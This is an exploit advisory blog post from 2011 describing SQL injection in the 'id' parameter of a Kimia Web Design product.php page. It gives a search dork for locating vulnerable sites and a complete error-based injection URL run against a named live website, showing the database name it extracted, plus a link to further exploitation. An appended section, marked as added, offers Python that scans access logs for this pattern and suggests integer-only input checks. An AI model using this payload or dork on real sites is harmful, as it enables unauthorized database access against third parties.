Friday, 6 May 2011

Kimia Web Design <= Remote (product.php) Based SQL Injection

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[~] Contact : knockoutr@msn.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Kimia Web Design
|~Price : N/A
|~Version : N/A
|~Vulnerability Style : SQL Injection
|~Vulnerability Dir : /
|~Google Keyword : Web Design by Kimia inurl:product.php?id=
|[~]Date : "26.04.2011"
|[~]Tested on :
Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
PHP/5.2.6-1+lenny10
AND DEMOS.
----------------------------------------------------------
product.php <= 'id' parameter is not secured
---------------------------------------------------------
Demos
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ===============================================================
    |{~~~~~~~~ Exploitation| SQL Injection ~~~~~~~~~~}|
     
     
         START! example : www.lapet.co.za
     
    [~] SQL injection (getting the DB name)
 
     http://www.lapet.co.za/product.php?id=69%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28database%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1
     [~] MySQL error : Duplicate entry '~'lapete_db1'~1' for key 1
     [+] Database name found: "lapete_db1"
 
    To continue exploitation, see this error-based attack example:
  
       = >              http://www.1337day.com/exploits/14509
     
    ================================================================
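
Added example (not part of the original advisory): a defender-side check that scans web server access logs for product.php requests whose 'id' value is not a plain integer, and tags those carrying the error-based pattern shown above (information_schema, floor(rand(, group by, concat(). The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [26/Apr/2011:10:00:01 +0200] "GET /product.php?id=69 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [26/Apr/2011:10:00:07 +0200] "GET /product.php?id=69%20and%28select%201%20from%28select%20count%28*%29,concat%28database%28%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 HTTP/1.1" 200 311 "-" "Mozilla/5.0"
203.0.113.9 - - [26/Apr/2011:10:00:09 +0200] "GET /product.php?id=69%2527 HTTP/1.1" 200 298 "-" "Mozilla/5.0"
198.51.100.2 - - [26/Apr/2011:10:01:00 +0200] "GET /index.php?page=2 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')

# Tokens typical of the error-based "Duplicate entry" technique in the advisory.
ERROR_BASED = [re.compile(p, re.I) for p in (
    r"information_schema", r"floor\s*\(\s*rand\s*\(", r"group\s+by", r"concat\s*\(")]

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %2527) before inspection."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return (client_ip, verdict) for product.php requests, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    ip, target = m.groups()
    url = urlsplit(target)
    if not url.path.endswith("/product.php"):
        return None
    ids = parse_qs(url.query, keep_blank_values=True).get("id", [""])
    value = fully_decode(ids[0]).strip()
    if re.fullmatch(r"\d{1,10}", value):
        return ip, "ok"
    hits = sum(1 for rx in ERROR_BASED if rx.search(value))
    return ip, "error-based-sqli" if hits >= 2 else "non-numeric-id"

def scan(log_text):
    return [r for r in map(classify, log_text.splitlines()) if r]

if __name__ == "__main__":
    for ip, verdict in scan(SAMPLE_LOG):
        print(ip, verdict)
```

The same integer-only rule applied in product.php before the value reaches the query, together with not echoing MySQL errors to the client, removes the behaviour this advisory relies on.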
